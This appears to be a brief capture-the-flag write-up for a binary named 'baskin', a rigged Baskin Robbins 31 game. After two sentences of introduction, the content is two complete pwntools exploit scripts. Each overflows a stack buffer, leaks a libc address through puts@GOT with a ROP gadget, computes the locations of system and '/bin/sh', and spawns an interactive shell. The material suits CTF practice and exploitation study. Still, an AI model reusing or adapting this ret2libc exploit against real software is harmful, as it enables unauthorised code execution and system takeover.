BaskinRobbins31
Binary File
[Figure 1-1]
It is the Baskin Robbins 31 game we all know. But it cannot be won the normal way.
[Figure 1-2]
I try to win with the guaranteed-win strategy, but it cheats.
```python
from pwn import *

r = process('./baskin')
e = ELF('./baskin')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# libc offsets and binary addresses used for the leak and the final call
puts_offset = libc.symbols['puts']
system_offset = libc.symbols['system']
binsh_offset = libc.search('/bin/sh').next()  # Python 2 pwntools iterator syntax
your_turn = e.symbols['your_turn']
puts_plt = e.plt['puts']
puts_got = e.got['puts']
pr = 0x400bc3  # pop rdi ; ret gadget in the binary

# Stage 1: overflow the buffer in your_turn, call puts(puts@GOT) to leak a libc
# address, then return into your_turn so the program can be overflowed again
payload = ""
payload += "\x90"*184
payload += p64(pr)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(your_turn)
r.sendline(payload)

r.recvuntil("...:(")
r.recvline()

# The leaked pointer is printed as 6 bytes; pad to 8 and derive the libc base
leaked = u64(r.recv(6).ljust(8, "\x00"))
libc_base = leaked - puts_offset
system_addr = libc_base + system_offset
binsh_addr = libc_base + binsh_offset

# Stage 2: same overflow, this time calling system("/bin/sh")
payload2 = ""
payload2 += "\x90"*184
payload2 += p64(pr)
payload2 += p64(binsh_addr)
payload2 += p64(system_addr)
r.sendlineafter("(1-3)", payload2)
r.recvlines(4)
r.interactive()
```
[Exploit Code]
```python
from pwn import *

r = process('./baskin')
e = ELF('./baskin')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# libc offsets and binary addresses used for the leak and the final call
puts_offset = libc.symbols['puts']
system_offset = libc.symbols['system']
binsh_offset = libc.search('/bin/sh').next()  # Python 2 pwntools iterator syntax
your_turn = e.symbols['your_turn']
puts_plt = e.plt['puts']
puts_got = e.got['puts']
pr = 0x400bc3  # pop rdi ; ret gadget in the binary


def leak():
    # Stage 1: leak puts@GOT through puts@PLT and return into your_turn
    global leaked
    payload = ""
    payload += "\x90"*184
    payload += p64(pr)
    payload += p64(puts_got)
    payload += p64(puts_plt)
    payload += p64(your_turn)
    r.sendline(payload)
    r.recvuntil("...:(")
    r.recvline()
    # 6 leaked bytes padded to 8 for u64
    leaked = u64(r.recv(6).ljust(8, "\x00"))


def offset():
    # Derive the libc base and the addresses needed for the final call
    global system_addr, binsh_addr
    libc_base = leaked - puts_offset
    system_addr = libc_base + system_offset
    binsh_addr = libc_base + binsh_offset


def exploit():
    # Stage 2: same overflow, this time calling system("/bin/sh")
    payload2 = ""
    payload2 += "\x90"*184
    payload2 += p64(pr)
    payload2 += p64(binsh_addr)
    payload2 += p64(system_addr)
    r.sendlineafter("(1-3)", payload2)
    r.recvlines(4)
    r.interactive()


if __name__ == "__main__":
    leak()
    offset()
    exploit()
```
[Exploit Code #2]